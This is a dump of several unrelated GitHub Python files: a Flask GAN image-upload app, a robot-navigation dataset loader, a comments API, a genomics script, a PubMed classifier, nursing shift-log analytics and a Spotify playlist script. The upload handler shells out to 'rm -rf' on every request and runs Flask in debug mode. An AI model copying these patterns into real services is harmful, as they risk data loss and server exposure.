\n# '''\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef upload():\n if request.method == 'POST' :\n print(\"this is request.files:\")\n print(request.files)\n if 'photo' in request.files:\n\n print(\"request has photo!!\")\n os.system('rm -rf images')\n os.system('rm -rf generated')\n os.system('mkdir images')\n os.system('mkdir generated')\n\n photo = request.files['photo']\n filename = secure_filename(photo.filename)\n photo.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n #photos.save(request.files['photo'])\n \n flash(\"Photo saved successfully.\", \"p\")\n # img = cv2.imread('images/'+str(request.files['photo'].filename))\n # img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n\n image = Image.open('./images/'+filename)\n\n image = image.convert(\"RGB\")\n transform=Compose([ \n tt.Resize((256,256),interpolation=Image.ANTIALIAS),\n tt.CenterCrop(256),\n tt.ToTensor(),\n tt.Normalize(mean=(0.5,), std=(0.5,))])\n\n\n image = transform(image)\n image = torch.unsqueeze(image, 0)\n\n # Load pretrained model\n model = UNet(True)\n model.load_state_dict(torch.load(\"./generator.pth\",map_location=torch.device('cpu')))\n # Rather use pickel model\n # filename = 'model_pickle.sav'\n # model = pickle.load(open(filename, 'rb'))\n prediction = model(image).detach()\n prediction = denorm(prediction.squeeze(0))\n fname = \"/test-images.png\"\n save_image(prediction, test_dir + fname)\n prediction = prediction.permute(1,2,0).numpy()\n # plt.imshow(image)\n \n gen_path_to_save = \"generated/\"+str(request.files['photo'].filename)\n orig_path_to_save = \"generated/orig\"+str(request.files['photo'].filename)\n plt.imsave(gen_path_to_save, prediction)\n plt.imsave(orig_path_to_save, denorm(image.squeeze(0)).permute(1,2,0).numpy())\n flash(\"Processed Successfully\", \"p\")\n path_to_save = [orig_path_to_save, gen_path_to_save]\n\n # return path_to_save[1]\n return render_template('upload.html', img_path=path_to_save)\n\n else:\n return \"'photo' not found in form-data!!\"\n\n # return prediction\n print(\"Its a GET request!!\")\n return render_template('upload.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True, use_reloader=True, threaded=True)\n # app.run()\n","repo_name":"akashg71/FloorPlan_GAN-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"19876336575","text":"import numpy as np\nimport os\nimport pickle\nimport yaml\nfrom typing import Any, Dict, List, Optional, Tuple\nimport tqdm\nimport io\nimport lmdb\n\nimport torch\nfrom torch.utils.data import Dataset\nimport torchvision.transforms.functional as TF\n\nfrom vint_train.data.data_utils import (\n img_path_to_data,\n calculate_sin_cos,\n get_data_path,\n to_local_coords,\n)\n\nclass ViNT_Dataset(Dataset):\n def __init__(\n self,\n data_folder: str,\n data_split_folder: str,\n dataset_name: str,\n image_size: Tuple[int, int],\n waypoint_spacing: int,\n min_dist_cat: int,\n max_dist_cat: int,\n min_action_distance: int,\n max_action_distance: int,\n negative_mining: bool,\n len_traj_pred: int,\n learn_angle: bool,\n context_size: int,\n context_type: str = \"temporal\",\n end_slack: int = 0,\n goals_per_obs: int = 1,\n normalize: bool = True,\n obs_type: str = \"image\",\n goal_type: str = \"image\",\n ):\n \"\"\"\n Main ViNT dataset class\n\n Args:\n data_folder (string): Directory with all the image data\n data_split_folder (string): Directory with filepaths.txt, a list of all trajectory names in the dataset split that are each seperated by a newline\n dataset_name (string): Name of the dataset [recon, go_stanford, scand, tartandrive, etc.]\n waypoint_spacing (int): Spacing between waypoints\n min_dist_cat (int): Minimum distance category to use\n max_dist_cat (int): Maximum distance category to use\n negative_mining (bool): Whether to use negative mining from the ViNG paper (Shah et al.) (https://arxiv.org/abs/2012.09812)\n len_traj_pred (int): Length of trajectory of waypoints to predict if this is an action dataset\n learn_angle (bool): Whether to learn the yaw of the robot at each predicted waypoint if this is an action dataset\n context_size (int): Number of previous observations to use as context\n context_type (str): Whether to use temporal, randomized, or randomized temporal context\n end_slack (int): Number of timesteps to ignore at the end of the trajectory\n goals_per_obs (int): Number of goals to sample per observation\n normalize (bool): Whether to normalize the distances or actions\n goal_type (str): What data type to use for the goal. The only one supported is \"image\" for now.\n \"\"\"\n self.data_folder = data_folder\n self.data_split_folder = data_split_folder\n self.dataset_name = dataset_name\n \n traj_names_file = os.path.join(data_split_folder, \"traj_names.txt\")\n with open(traj_names_file, \"r\") as f:\n file_lines = f.read()\n self.traj_names = file_lines.split(\"\\n\")\n if \"\" in self.traj_names:\n self.traj_names.remove(\"\")\n\n self.image_size = image_size\n self.waypoint_spacing = waypoint_spacing\n self.distance_categories = list(\n range(min_dist_cat, max_dist_cat + 1, self.waypoint_spacing)\n )\n self.min_dist_cat = self.distance_categories[0]\n self.max_dist_cat = self.distance_categories[-1]\n self.negative_mining = negative_mining\n if self.negative_mining:\n self.distance_categories.append(-1)\n self.len_traj_pred = len_traj_pred\n self.learn_angle = learn_angle\n\n self.min_action_distance = min_action_distance\n self.max_action_distance = max_action_distance\n\n self.context_size = context_size\n assert context_type in {\n \"temporal\",\n \"randomized\",\n \"randomized_temporal\",\n }, \"context_type must be one of temporal, randomized, randomized_temporal\"\n self.context_type = context_type\n self.end_slack = end_slack\n self.goals_per_obs = goals_per_obs\n self.normalize = normalize\n self.obs_type = obs_type\n self.goal_type = goal_type\n\n # load data/data_config.yaml\n with open(\n os.path.join(os.path.dirname(__file__), \"data_config.yaml\"), \"r\"\n ) as f:\n all_data_config = yaml.safe_load(f)\n assert (\n self.dataset_name in all_data_config\n ), f\"Dataset {self.dataset_name} not found in data_config.yaml\"\n dataset_names = list(all_data_config.keys())\n dataset_names.sort()\n # use this index to retrieve the dataset name from the data_config.yaml\n self.dataset_index = dataset_names.index(self.dataset_name)\n self.data_config = all_data_config[self.dataset_name]\n self.trajectory_cache = {}\n self._load_index()\n self._build_caches()\n \n if self.learn_angle:\n self.num_action_params = 3\n else:\n self.num_action_params = 2\n\n def __getstate__(self):\n state = self.__dict__.copy()\n state[\"_image_cache\"] = None\n return state\n \n def __setstate__(self, state):\n self.__dict__ = state\n self._build_caches()\n\n def _build_caches(self, use_tqdm: bool = True):\n \"\"\"\n Build a cache of images for faster loading using LMDB\n \"\"\"\n cache_filename = os.path.join(\n self.data_split_folder,\n f\"dataset_{self.dataset_name}.lmdb\",\n )\n\n # Load all the trajectories into memory. These should already be loaded, but just in case.\n for traj_name in self.traj_names:\n self._get_trajectory(traj_name)\n\n \"\"\"\n If the cache file doesn't exist, create it by iterating through the dataset and writing each image to the cache\n \"\"\"\n if not os.path.exists(cache_filename):\n tqdm_iterator = tqdm.tqdm(\n self.goals_index,\n disable=not use_tqdm,\n dynamic_ncols=True,\n desc=f\"Building LMDB cache for {self.dataset_name}\"\n )\n with lmdb.open(cache_filename, map_size=2**40) as image_cache:\n with image_cache.begin(write=True) as txn:\n for traj_name, time in tqdm_iterator:\n image_path = get_data_path(self.data_folder, traj_name, time)\n with open(image_path, \"rb\") as f:\n txn.put(image_path.encode(), f.read())\n\n # Reopen the cache file in read-only mode\n self._image_cache: lmdb.Environment = lmdb.open(cache_filename, readonly=True)\n\n def _build_index(self, use_tqdm: bool = False):\n \"\"\"\n Build an index consisting of tuples (trajectory name, time, max goal distance)\n \"\"\"\n samples_index = []\n goals_index = []\n\n for traj_name in tqdm.tqdm(self.traj_names, disable=not use_tqdm, dynamic_ncols=True):\n traj_data = self._get_trajectory(traj_name)\n traj_len = len(traj_data[\"position\"])\n\n for goal_time in range(0, traj_len):\n goals_index.append((traj_name, goal_time))\n\n begin_time = self.context_size * self.waypoint_spacing\n end_time = traj_len - self.end_slack - self.len_traj_pred * self.waypoint_spacing\n for curr_time in range(begin_time, end_time):\n max_goal_distance = min(self.max_dist_cat * self.waypoint_spacing, traj_len - curr_time - 1)\n samples_index.append((traj_name, curr_time, max_goal_distance))\n\n return samples_index, goals_index\n\n def _sample_goal(self, trajectory_name, curr_time, max_goal_dist):\n \"\"\"\n Sample a goal from the future in the same trajectory.\n Returns: (trajectory_name, goal_time, goal_is_negative)\n \"\"\"\n goal_offset = np.random.randint(0, max_goal_dist + 1)\n if goal_offset == 0:\n trajectory_name, goal_time = self._sample_negative()\n return trajectory_name, goal_time, True\n else:\n goal_time = curr_time + int(goal_offset * self.waypoint_spacing)\n return trajectory_name, goal_time, False\n\n def _sample_negative(self):\n \"\"\"\n Sample a goal from a (likely) different trajectory.\n \"\"\"\n return self.goals_index[np.random.randint(0, len(self.goals_index))]\n\n def _load_index(self) -> None:\n \"\"\"\n Generates a list of tuples of (obs_traj_name, goal_traj_name, obs_time, goal_time) for each observation in the dataset\n \"\"\"\n index_to_data_path = os.path.join(\n self.data_split_folder,\n f\"dataset_dist_{self.min_dist_cat}_to_{self.max_dist_cat}_context_{self.context_type}_n{self.context_size}_slack_{self.end_slack}.pkl\",\n )\n try:\n # load the index_to_data if it already exists (to save time)\n with open(index_to_data_path, \"rb\") as f:\n self.index_to_data, self.goals_index = pickle.load(f)\n except:\n # if the index_to_data file doesn't exist, create it\n self.index_to_data, self.goals_index = self._build_index()\n with open(index_to_data_path, \"wb\") as f:\n pickle.dump((self.index_to_data, self.goals_index), f)\n\n def _load_image(self, trajectory_name, time):\n image_path = get_data_path(self.data_folder, trajectory_name, time)\n\n try:\n with self._image_cache.begin() as txn:\n image_buffer = txn.get(image_path.encode())\n image_bytes = bytes(image_buffer)\n image_bytes = io.BytesIO(image_bytes)\n return img_path_to_data(image_bytes, self.image_size)\n except TypeError:\n print(f\"Failed to load image {image_path}\")\n\n def _compute_actions(self, traj_data, curr_time, goal_time):\n start_index = curr_time\n end_index = curr_time + self.len_traj_pred * self.waypoint_spacing + 1\n yaw = traj_data[\"yaw\"][start_index:end_index:self.waypoint_spacing]\n positions = traj_data[\"position\"][start_index:end_index:self.waypoint_spacing]\n goal_pos = traj_data[\"position\"][min(goal_time, len(traj_data[\"position\"]) - 1)]\n\n if len(yaw.shape) == 2:\n yaw = yaw.squeeze(1)\n\n if yaw.shape != (self.len_traj_pred + 1,):\n const_len = self.len_traj_pred + 1 - yaw.shape[0]\n yaw = np.concatenate([yaw, np.repeat(yaw[-1], const_len)])\n positions = np.concatenate([positions, np.repeat(positions[-1][None], const_len, axis=0)], axis=0)\n\n assert yaw.shape == (self.len_traj_pred + 1,), f\"{yaw.shape} and {(self.len_traj_pred + 1,)} should be equal\"\n assert positions.shape == (self.len_traj_pred + 1, 2), f\"{positions.shape} and {(self.len_traj_pred + 1, 2)} should be equal\"\n\n waypoints = to_local_coords(positions, positions[0], yaw[0])\n goal_pos = to_local_coords(goal_pos, positions[0], yaw[0])\n\n assert waypoints.shape == (self.len_traj_pred + 1, 2), f\"{waypoints.shape} and {(self.len_traj_pred + 1, 2)} should be equal\"\n\n if self.learn_angle:\n yaw = yaw[1:] - yaw[0]\n actions = np.concatenate([waypoints[1:], yaw[:, None]], axis=-1)\n else:\n actions = waypoints[1:]\n \n if self.normalize:\n actions[:, :2] /= self.data_config[\"metric_waypoint_spacing\"] * self.waypoint_spacing\n goal_pos /= self.data_config[\"metric_waypoint_spacing\"] * self.waypoint_spacing\n\n assert actions.shape == (self.len_traj_pred, self.num_action_params), f\"{actions.shape} and {(self.len_traj_pred, self.num_action_params)} should be equal\"\n\n return actions, goal_pos\n \n def _get_trajectory(self, trajectory_name):\n if trajectory_name in self.trajectory_cache:\n return self.trajectory_cache[trajectory_name]\n else:\n with open(os.path.join(self.data_folder, trajectory_name, \"traj_data.pkl\"), \"rb\") as f:\n traj_data = pickle.load(f)\n self.trajectory_cache[trajectory_name] = traj_data\n return traj_data\n\n def __len__(self) -> int:\n return len(self.index_to_data)\n\n def __getitem__(self, i: int) -> Tuple[torch.Tensor]:\n \"\"\"\n Args:\n i (int): index to ith datapoint\n Returns:\n Tuple of tensors containing the context, observation, goal, transformed context, transformed observation, transformed goal, distance label, and action label\n obs_image (torch.Tensor): tensor of shape [3, H, W] containing the image of the robot's observation\n goal_image (torch.Tensor): tensor of shape [3, H, W] containing the subgoal image \n dist_label (torch.Tensor): tensor of shape (1,) containing the distance labels from the observation to the goal\n action_label (torch.Tensor): tensor of shape (5, 2) or (5, 4) (if training with angle) containing the action labels from the observation to the goal\n which_dataset (torch.Tensor): index of the datapoint in the dataset [for identifying the dataset for visualization when using multiple datasets]\n \"\"\"\n f_curr, curr_time, max_goal_dist = self.index_to_data[i]\n f_goal, goal_time, goal_is_negative = self._sample_goal(f_curr, curr_time, max_goal_dist)\n\n # Load images\n context = []\n if self.context_type == \"temporal\":\n # sample the last self.context_size times from interval [0, curr_time)\n context_times = list(\n range(\n curr_time + -self.context_size * self.waypoint_spacing,\n curr_time + 1,\n self.waypoint_spacing,\n )\n )\n context = [(f_curr, t) for t in context_times]\n else:\n raise ValueError(f\"Invalid context type {self.context_type}\")\n\n obs_image = torch.cat([\n self._load_image(f, t) for f, t in context\n ])\n\n # Load goal image\n goal_image = self._load_image(f_goal, goal_time)\n\n # Load other trajectory data\n curr_traj_data = self._get_trajectory(f_curr)\n curr_traj_len = len(curr_traj_data[\"position\"])\n assert curr_time < curr_traj_len, f\"{curr_time} and {curr_traj_len}\"\n\n goal_traj_data = self._get_trajectory(f_goal)\n goal_traj_len = len(goal_traj_data[\"position\"])\n assert goal_time < goal_traj_len, f\"{goal_time} an {goal_traj_len}\"\n\n # Compute actions\n actions, goal_pos = self._compute_actions(curr_traj_data, curr_time, goal_time)\n \n # Compute distances\n if goal_is_negative:\n distance = self.max_dist_cat\n else:\n distance = (goal_time - curr_time) // self.waypoint_spacing\n assert (goal_time - curr_time) % self.waypoint_spacing == 0, f\"{goal_time} and {curr_time} should be separated by an integer multiple of {self.waypoint_spacing}\"\n actions = actions.astype(np.float32) #Nigam\n actions_torch = torch.as_tensor(actions, dtype=torch.float32)\n if self.learn_angle:\n actions_torch = calculate_sin_cos(actions_torch)\n \n action_mask = (\n (distance < self.max_action_distance) and\n (distance > self.min_action_distance) and\n (not goal_is_negative)\n )\n goal_pos = goal_pos.astype(np.float32)#Nigam\n return (\n torch.as_tensor(obs_image, dtype=torch.float32),\n torch.as_tensor(goal_image, dtype=torch.float32),\n actions_torch,\n torch.as_tensor(distance, dtype=torch.int64),\n torch.as_tensor(goal_pos, dtype=torch.float32),\n torch.as_tensor(self.dataset_index, dtype=torch.int64),\n torch.as_tensor(action_mask, dtype=torch.float32),\n )\n","repo_name":"NigamKatta/Nomad","sub_path":"train/vint_train/data/vint_dataset.py","file_name":"vint_dataset.py","file_ext":"py","file_size_in_byte":15787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21669560423","text":"from flask import request\nfrom flask_restful import Resource\nfrom flask_jwt_extended import get_jwt_identity, jwt_required\nfrom ..models import post, profile\nfrom ..models.embedded_profile import EmbeddedProfile\nfrom ..models.comment import Comment, SubComment\nfrom ..errors import (InternalServerError)\n\nentities = {\n \"profile\": profile.UserProfile,\n \"post\": post.Post\n}\n\n\nclass CommentApi(Resource):\n\n @jwt_required\n def post(self):\n body = request.get_json()\n comment_type = body['type']\n element_id = body['id']\n entity = entities[comment_type].objects.get(id=element_id)\n try:\n if comment_type == 'sub_comment':\n Comment.comments.append(\n SubComment(\n comment_by=EmbeddedProfile(**body['user']),\n comment=body['comment'],\n )\n )\n else:\n entity.comments.append(\n Comment(\n comment_by=EmbeddedProfile(**body['user']),\n comment=body['comment'],\n )\n )\n except Exception:\n raise InternalServerError\n\n return {}, 200\n\n def put(self):\n pass\n\n\nroutes = []\n","repo_name":"sandergv/Musicom_api","sub_path":"musicom/api/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"33223228968","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 21 22:04:52 2019\n\n@author: davidnoble\n\"\"\"\n\nimport pandas as pd\nimport pybedtools as bd\n\n# accessing BED files of PacBio sequencing data and annotated genome\nsequences = bd.BedTool('pacbio-190731-facs-assign.bed')\nannotations = bd.BedTool('saccharomyces_cerevisiae.bed')\n\nfragment_peaks = pd.read_csv('joint-frag-mle-peak.csv')\n\n# finding overlap, where entirety of item from SEQUENCES has overlap with item in ANNOTATIONS\n# some will still span introns, due to nature of ANNOTATIONS data\nintersections = sequences.intersect(annotations, f=1.0, wo=True, nonamecheck=True).to_dataframe()\n\n# creating DataFrames from BedTool objects (for ease)\nsequences = sequences.to_dataframe(names = ['chrom', 'start', 'end', \n 'barcode', 'num_reads', 'strand'])\nannotations = annotations.to_dataframe()\n\ncols=[6,10,11,12,13,14]\nintersects = intersections.drop(intersections.columns[cols], axis=1)\nintersects.columns = ['chrom','start','end','barcode','num_reads',\n 'strand','geneStart','geneEnd','yorf','exons',\n 'exonLengths','exonStarts','overlap']\n\nin_frame = intersects[(intersects['start'] - intersects['geneStart']) % 3 == 0]\nprint(in_frame.head()['exonStarts'])","repo_name":"dvdnobl/protein-coordinates","sub_path":"Fragment_coordinates/protein_coordinates.py","file_name":"protein_coordinates.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"37133571499","text":"from collections import Counter\nimport pickle\nfrom Bio import Entrez, Medline\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom utils import abstract2words\n\nEntrez.email = 'hsiaoyi0504@gmail.com'\n\n\ndef get_abstracts(file_name):\n pubmed_ids = []\n with open(file_name) as f:\n for line in f:\n pubmed_ids.append(int(line.rstrip('\\n')))\n abstracts = []\n for pubmed_id in pubmed_ids:\n fetch_handler = Entrez.efetch(\n db='pubmed', rettype='medline', retmode='text', id=str(pubmed_id))\n record = Medline.read(fetch_handler)\n abstracts.append(record['AB'])\n return abstracts\n\n\nif __name__ == '__main__':\n pos_abstracts = get_abstracts('positive_examples')\n neg_abstracts = get_abstracts('negative_examples')\n all_abstracts = pos_abstracts + neg_abstracts\n all_words = set()\n for i, a in enumerate(all_abstracts):\n words = abstract2words(a)\n all_words.update(words)\n all_abstracts[i] = words\n word_dict = dict(zip(range(len(all_words)), all_words))\n X = []\n for a in all_abstracts:\n c = Counter(a)\n values = []\n for i in range(len(all_words)):\n values.append(c[word_dict[i]])\n total_words = sum(values)\n values = [v / total_words for v in values]\n X.append(values)\n y = [1] * len(pos_abstracts) + [0] * len(neg_abstracts)\n clf = KNeighborsClassifier(n_neighbors=3)\n clf.fit(X, y)\n pickle.dump([clf, word_dict], open('model.pkl', 'wb'))\n","repo_name":"hsiaoyi0504/related_papers","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"35309649462","text":"from is_pangram import is_pangram\nimport unittest\n\n\nclass Test(unittest.TestCase):\n def test_1(self):\n result = is_pangram(\"The quick, brown fox jumps over the lazy dog!\")\n self.assertEqual(result, True)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"maltewirz/code-challenges","sub_path":"src/code-challenges/codewars/6KYU/isPangram/test_is_pangram.py","file_name":"test_is_pangram.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"167551146","text":"import sys\nimport pandas as pd\nimport datetime\n\n# pandas settings\npd.options.mode.chained_assignment = None # default='warn\npd.set_option('display.expand_frame_repr', False)\n\nif __name__ == '__main__': # we want to import from same directory if using this\n # module as-is (for debugging mainly, or for loading data in the future)\n sys.path.append(\".\")\n from DAOs.shift_log_DAO import shift_log_DAO\nelse: # if called from index.py\n from DAOs.shift_log_DAO import shift_log_DAO\n\nclass input_shiftlogs(object):\n # input_raw_data = pd.DataFrame()\n sldao = shift_log_DAO()\n input_raw_data = sldao.get_all_logs()\n input_raw_data['datetime'] = pd.to_datetime(input_raw_data['datetime'], format='%Y-%m-%dT%H:%M:%S')\n input_raw_data['food_consumption'] = pd.to_numeric(input_raw_data['food_consumption'])\n input_raw_data['pulse_pressure'] = input_raw_data['systolic_bp'] - input_raw_data['diastolic_bp']\n input_raw_max_date = input_raw_data['datetime'].max()\n input_raw_min_date = input_raw_data['datetime'].min()\n # print(input_raw_data)\n daytime_start = datetime.time(7, 30)\n daytime_end = datetime.time(19, 30)\n\n # changeable parameters NOTE: should be changeable\n para_temperature_max = 37.6\n para_temperature_min = 35.5\n para_temperature_sd = 0.66\n para_pulse_pressure_max = 50\n\n @staticmethod\n def update_shiftlogs_data():\n input_shiftlogs.input_raw_data = input_shiftlogs.sldao.get_all_logs()\n input_shiftlogs.input_raw_data['datetime'] = pd.to_datetime(input_shiftlogs.input_raw_data['datetime'], format='%Y-%m-%dT%H:%M:%S')\n input_shiftlogs.input_raw_data['food_consumption'] = pd.to_numeric(input_shiftlogs.input_raw_data['food_consumption'])\n input_shiftlogs.input_raw_data['pulse_pressure'] = input_shiftlogs.input_raw_data['systolic_bp'] - input_shiftlogs.input_raw_data['diastolic_bp']\n input_shiftlogs.input_raw_max_date = input_shiftlogs.input_raw_data['datetime'].max()\n input_shiftlogs.input_raw_min_date = input_shiftlogs.input_raw_data['datetime'].min()\n\n @staticmethod\n def date_only(original_date):\n return original_date.replace(hour=0, minute=0, second=0, microsecond=0)\n\n @staticmethod\n def get_logs_filter_options():\n '''Returns labels and values in an array of tuples'''\n return [('No. of Falls', 'num_falls'), ('No. of Near Falls', 'num_near_falls'),\n ('Food Consumption', 'food_consumption'), ('Temperature', 'temperature'), ('Systolic//Diastolic Bp', 'sys_dia'),\n ('Pulse Pressure', 'pulse_pressure'), ('Pulse Rate', 'pulse_rate')]\n\n @staticmethod\n def get_relevant_data(start_date, end_date, patient_id):\n '''\n Retrieve sensor data based on location, start and end dates, and the device\n grouped=True to get grouped data for toilet visits\n '''\n # TODO: this part probably is the best to convert to retrieve from DB\n relevant_data = input_shiftlogs.input_raw_data.loc[(input_shiftlogs.input_raw_data['patient_id'] == patient_id)\n & (input_shiftlogs.input_raw_data['datetime'] < end_date)\n & (input_shiftlogs.input_raw_data['datetime'] > start_date),\n ['patient_id', 'datetime', 'num_falls', 'num_near_falls', 'food_consumption',\n 'temperature', 'systolic_bp', 'diastolic_bp', 'pulse_pressure', 'pulse_rate']]\n return relevant_data\n\n @staticmethod\n def get_logs_by_date(start_date=input_raw_min_date, end_date=input_raw_max_date,\n patient_id=1, time_period=None):\n \"\"\"\n Function returns dates and aggregated number of times the sensor was activated\n To get day only, use time_period='Day' and to get night_only use time_period='Night'\n \"\"\"\n\n # NOTE: last day of the returned output is not accurate if offset is used because the next day's data is needed to get the current night's data\n current_data = input_shiftlogs.get_relevant_data(start_date, end_date, patient_id)\n # print(current_data)\n\n # print(current_data)\n if time_period == 'Day':\n current_data = current_data.loc[(current_data['datetime'].dt.time >= input_shiftlogs.daytime_start)\n & (current_data['datetime'].dt.time < input_shiftlogs.daytime_end)]\n elif time_period == 'Night':\n current_data = current_data.loc[(current_data['datetime'].dt.time < input_shiftlogs.daytime_start)\n | (current_data['datetime'].dt.time > input_shiftlogs.daytime_end)]\n\n # group by date only\n current_data['date_only'] = current_data['datetime'].apply(input_shiftlogs.date_only)\n result_data = current_data.groupby(['date_only'], as_index=False)[\n 'num_falls', 'num_near_falls', 'food_consumption', 'temperature', 'systolic_bp', 'diastolic_bp', 'pulse_pressure', 'pulse_rate'].mean()\n\n # add 0 for days with no data\n result_data.set_index('date_only', inplace=True)\n if isinstance(start_date, str):\n start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')\n\n if isinstance(end_date, str):\n end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d')\n\n all_days_range = pd.date_range(start_date.date(), end_date.date() + datetime.timedelta(days=-1), freq='D')\n try:\n result_data = result_data.loc[all_days_range]\n except KeyError as e:\n erroroutput = pd.DataFrame()\n erroroutput['num_falls'] = []\n erroroutput['num_near_falls'] = []\n erroroutput['food_consumption'] = []\n erroroutput['temperature'] = []\n erroroutput['systolic_bp'] = []\n erroroutput['diastolic_bp'] = []\n erroroutput['pulse_pressure'] = []\n erroroutput['pulse_rate'] = []\n erroroutput['date_only'] = []\n result_data.fillna(0, inplace=True)\n\n # undo set index\n result_data.reset_index(inplace=True)\n result_data.rename(columns={'index': 'date_only'}, inplace=True)\n # print(\"result data from get_num_visits_by_date\\n\", result_data)\n return result_data\n\n @staticmethod\n def get_residents_options():\n return input_shiftlogs.input_raw_data['patient_id'].unique().tolist()\n\n @staticmethod\n def get_shiftlog_indicators(patient_id, current_sys_time=None):\n ret_alerts = []\n if not current_sys_time:\n current_sys_time = datetime.datetime.now()\n\n current_sys_date = current_sys_time.date()\n three_weeks_ago = current_sys_date + datetime.timedelta(days=-21)\n one_week_ago = current_sys_date + datetime.timedelta(days=-7)\n four_weeks_ago = current_sys_date + datetime.timedelta(days=-28)\n\n # get data first\n current_data = input_shiftlogs.get_relevant_data(four_weeks_ago, current_sys_date,patient_id)\n # print(current_data)\n # patient_id,datetime,num_falls,num_near_falls,food_consumption,temperature,systolic_bp,diastolic_bp,pulse_pressure,pulse_rate\n # compare averages\n three_week_data = current_data.loc[(current_data['datetime'] < one_week_ago)]\n # print(three_week_data)\n past_week_data = current_data.loc[current_data['datetime'] > one_week_ago]\n # print(past_week_data)\n\n # check averages then check for significant out-of-range numbers\n # check temperatures\n temperature_sd = three_week_data['temperature'].std() # NOTE: maybe can change to some other stdevs\n three_week_average_temp = three_week_data['temperature'].mean()\n past_week_average_temp = past_week_data['temperature'].mean()\n\n if (past_week_average_temp - input_shiftlogs.para_temperature_sd * temperature_sd) > three_week_average_temp:\n ret_alerts.append(\"Significant increase in temperature in the past week\")\n elif (past_week_average_temp + input_shiftlogs.para_temperature_sd * temperature_sd) < three_week_average_temp:\n ret_alerts.append(\"Significant decrease in temperature in the past week\")\n\n if any((past_week_data['temperature'] < input_shiftlogs.para_temperature_min) | (past_week_data['temperature'] > input_shiftlogs.para_temperature_max)):\n ret_alerts.append(\"Abnormal temperatures detected in past week\")\n\n return ret_alerts\n\n# if __name__ == '__main__': # for local testing\n# input_shiftlogs.update_shiftlogs_data()\n# print(\"hi\")\n# # print(input_shiftlogs.get_logs_by_date(datetime.datetime(2018, 10, 1, 0, 0, 0), datetime.datetime.now(), 1))\n# print(input_shiftlogs.get_shiftlog_indicators(1, datetime.datetime(2018, 10, 10, 0, 0, 0)))\n","repo_name":"davidlwr/InternetExplorers","sub_path":"web/apps/input_shiftlogs.py","file_name":"input_shiftlogs.py","file_ext":"py","file_size_in_byte":8869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71775418470","text":"from __future__ import unicode_literals\n\nfrom django.db import models\n\n# Create your models here.\n\nclass Brand(models.Model):\n brandname = models.CharField(max_length=140, blank=False, null=False)\n\n def __str__(self):\n return self.brandname\n\n class Meta:\n verbose_name = 'Brand'\n verbose_name_plural = 'Brands'\n ordering = ('id', )","repo_name":"devnandito/inventory","sub_path":"brands/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72494011430","text":"import spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nimport constants\nimport spotipy.util as util\nimport json\nimport os\nfrom os import path\nimport time\nimport random\nfrom similar import similar\nfrom valence import valence\n\ndef valence(trackids, sp):\n\n features = sp.audio_features(trackids) \n\n # swap until features has ascending valence\n for i in range(0, len(features) - 1):\n smallest = [i, features[i]['valence']]\n for j in range(i, len(features)):\n if (features[j]['valence'] < smallest[1] ):\n smallest = [j, features[j]['valence']]\n features[i], features[smallest[0]] = features[smallest[0]], features[i]\n\n\n # delete playlists with the same name\n playlist_name = 'VAL'\n playlists = sp.user_playlists(constants.SPOTIFY_USERNAME)['items']\n for x in playlists:\n if x['name'] == playlist_name:\n sp.user_playlist_unfollow(constants.SPOTIFY_USERNAME, x['id'])\n\n # make a playlist and add ascending valence tracks to it\n sp.user_playlist_create(constants.SPOTIFY_USERNAME, name=playlist_name)\n PLAYLIST_ID = sp.user_playlists(constants.SPOTIFY_USERNAME)['items'][0]['id']\n for i in features:\n uri = [i['uri']]\n sp.user_playlist_add_tracks(constants.SPOTIFY_USERNAME, PLAYLIST_ID, uri)\n\n\n print('valence playlist made, waiting for mood...')\n while(True):\n # random songs for each mood\n numSongsSection = int(len(features) / 3 )\n randomInteger = random.randint(0, numSongsSection - 1) \n sadUri = features[randomInteger]['uri']\n neutralUri = features[randomInteger + numSongsSection]['uri']\n happyUri = features[randomInteger + (2 * numSongsSection)]['uri']\n uri = ''\n playSong = False\n type = 'neutral'\n if(path.exists('happy')):\n type = 'happy'\n playSong = True\n os.remove(\"happy\")\n if(path.exists('sad')):\n type='sad'\n playSong = True\n os.remove(\"sad\")\n if(path.exists('neutral')):\n type='neutral'\n playSong = True\n os.remove(\"neutral\")\n if(playSong):\n playSong = False\n devices = sp.devices()\n print(json.dumps(devices, sort_keys=True, indent=4))\n deviceID = devices['devices'][0]['id'] \n if(type=='happy'):\n uri=happyUri\n if(type=='sad'):\n uri=sadUri\n if(type=='neutral'):\n uri=neutralUri\n sp.start_playback(deviceID, None, [uri])\n time.sleep(0.2)","repo_name":"anita-1/emotionator","sub_path":"valence.py","file_name":"valence.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"71461257189","text":"#!/usr/bin/python3\n\"\"\"A class that inherits from the class rectangle to define\n the properties of the square\"\"\"\n\n\nfrom models.rectangle import Rectangle\n\n\nclass 